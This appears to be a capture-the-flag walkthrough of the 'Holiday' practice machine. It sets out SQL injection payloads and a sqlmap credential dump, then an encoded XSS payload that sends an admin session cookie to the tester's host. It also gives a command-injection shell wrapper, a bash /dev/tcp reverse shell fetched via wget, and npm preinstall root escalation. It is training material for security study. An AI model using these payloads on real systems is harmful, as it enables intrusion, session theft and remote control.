[Meachines] [Hard] Holiday SQLI+XSS-Bypass+RCE-HEX-Shell+TRP00F+npm特權升級

Мартин.2025-05-05 8:01

Information Gathering

IP Address Opening Ports
10.10.10.25 TCP:22,8000

$ ip='10.10.10.25'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

bash 复制代码 
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c3aa3dbd0e0146c96b4673f3d1bacef2 (RSA)
|   256 b567f5eb8d11e90fddf452259fb12f23 (ECDSA)
|_  256 79e97896c5a8f4028390583fe58dfa98 (ED25519)
8000/tcp open  http    Node.js Express framework
|_http-title: Error
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

SQLI

http://10.10.10.25:8000/

$ dirsearch -u 'http://10.10.10.25:8000/'

http://10.10.10.25:8000/login

复制代码 
POST /login HTTP/1.1
Host: 10.10.10.25:8000
Content-Length: 24
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.10.25:8000
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.10.25:8000/login
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

username=1x&password=1

username=x"--+&password=1

Error Occurred
username=x"))--+&password=1

Invalid User
username=x")) OR 1=1 --+&password=1

Incorrect Password
username=1")) ORDER BY 4 --+&password=1

字段為4

確認回顯位置

username=1")) UNION SELECT 88,99,66,67 --+&password=1

確認數據庫類型

username=1")) UNION SELECT 88,sqlite_version(),66,67 --+&password=1

Sqlite 3.15.0
username=1")) UNION SELECT 88,group_concat(name, ','),66,67 FROM sqlite_master WHERE type='table' --+&password=1

users,sqlite_sequence,notes,bookings,sessions

$ sqlmap -r /tmp/sql -T users,notes,sessions --dump --threads 10

复制代码 
+----+--------+----------------------------------+----------+
| id | active | password                         | username |
+----+--------+----------------------------------+----------+
| 1  | 1      | fdc8cd4cff2c19e0d1022e78481ddf36 | RickA    |
+----+--------+----------------------------------+----------+

nevergonnagiveyouup

http://10.10.10.25:8000/agent

XSS Bypass

http://10.10.10.25:8000/vac/8dd841ff-3f44-4f2b-9324-9a833e2c6b65

所有備註都必須經過管理員審核 --- 此過程最多可能需要 1 分鐘。

js 复制代码 
<img src='http://10.10.16.13:8090/SUCCESSFULLY' />
sh 复制代码 
$ url="http://10.10.16.13:10000/1.js"
js="document.write('<script src=\"$url\"></script>');"
echo -n "$js" | od -An -t u1 | tr -d '\n' | sed 's| \+|,|g; s|^,||; s|^|<img src="/><script>eval(String.fromCharCode(|; s|$|))</script>"/>|'
JS 复制代码 
window.addEventListener('DOMContentLoaded', function(e) {
    window.location = "http://10.10.16.13:10000/?cookie=" + encodeURI(document.getElementsByName("cookie")[0].value)
})
复制代码 
connect.sid=s%3a98a88d30-27f1-11f0-ade9-71050c9a43af.4gmaIMgfX/Hym%2bqFylhAqwyx1QklsHSDYZlccAj0iF0

RCE && HEX Reverse Shell

http://10.10.10.25:8000/admin

http://10.10.10.25:8000/admin/export?table=.../

這似乎在在防止命令執行[a-z0-9&\s\/]

SH 复制代码 
#!/bin/bash

 
urlencode() {
  python3 -c "import sys, urllib.parse; print(urllib.parse.quote(sys.argv[1]))" "$1"
}
while true; do
  echo -n "SHELL$ "
  read cmd
  if [[ "$cmd" == "exit" ]]; then
    break
  fi
  encoded_cmd=$(urlencode "$cmd")
  url="http://10.10.10.25:8000/admin/export?table=x%26${encoded_cmd}"
  curl "$url" \
    --cookie "connect.sid=s%3a98a88d30-27f1-11f0-ade9-71050c9a43af.4gmaIMgfX/Hym%2bqFylhAqwyx1QklsHSDYZlccAj0iF0" \
    -H 'Cache-Control: max-age=0' \
    -H 'Upgrade-Insecure-Requests: 1' \
    -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36' \
    -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' \
    -H 'Accept-Encoding: gzip, deflate' \
    -H 'Accept-Language: en-US,en;q=0.9' \
    --http1.1
done

$ ./exp.sh

sh 复制代码 
#!/bin/bash

bash -i >& /dev/tcp/10.10.16.13/443 0>&1

將IP轉爲十六進制

$ printf '0x%02X%02X%02X%02X\n' $(echo 10.10.16.13 | tr '.' ' ') | tr 'A-F' 'a-f'

shell$ wget 0x0a0a100d/shell

SHELL$ bash shell

User.txt

79081c45597fb44319152df89b15934e

TRP00F

https://github.com/MartinxMax/trp00f

Privilege Escalation:npm

algernon@holiday:~$ sudo -l

創建/get/package.json

json 复制代码 
{
  "name": "shell",
  "version": "1.0.0",
  "scripts": {
    "preinstall": "/bin/bash"
  }
}

algernon@holiday:~$ sudo npm i ./get/ --unsafe

Root.txt

0bfed7171c81458d5d24175642c8c0b2

相关推荐
一斤代码2 小时前
vue3 下载图片(标签内容可转图)
前端·javascript·vue
中微子2 小时前
React Router 源码深度剖析解决面试中的深层次问题
前端·react.js
光影少年2 小时前
从前端转go开发的学习路线
前端·学习·golang
中微子3 小时前
React Router 面试指南:从基础到实战
前端·react.js·前端框架
GuokLiu3 小时前
250708-Svelte项目从Debian迁移到无法联网的RHEL全流程指南
npm·svelte
3Katrina3 小时前
深入理解 useLayoutEffect:解决 UI "闪烁"问题的利器
前端·javascript·面试
前端_学习之路4 小时前
React--Fiber 架构
前端·react.js·架构
伍哥的传说4 小时前
React 实现五子棋人机对战小游戏
前端·javascript·react.js·前端框架·node.js·ecmascript·js
qq_424409194 小时前
uniapp的app项目,某个页面长时间无操作,返回首页
前端·vue.js·uni-app
我在北京coding4 小时前
element el-table渲染二维对象数组
前端·javascript·vue.js
热门推荐
01【无标题】02集群聊天服务器---MySQL数据库的建立03Coze扣子平台完整体验和实践(附国内和国际版对比)04深度神经网络训练过程与常见概念05KGG转MP3工具|非KGM文件|解密音频06扣子(coze)实战|我用扣子搭建了一个自动分析小红薯笔记内容的AI应用|详细步骤拆解07使用Ruby接入实时行情API教程08Java学习第十五部分——MyBatis09DeepSeek各版本说明与优缺点分析10Java类变量(静态变量)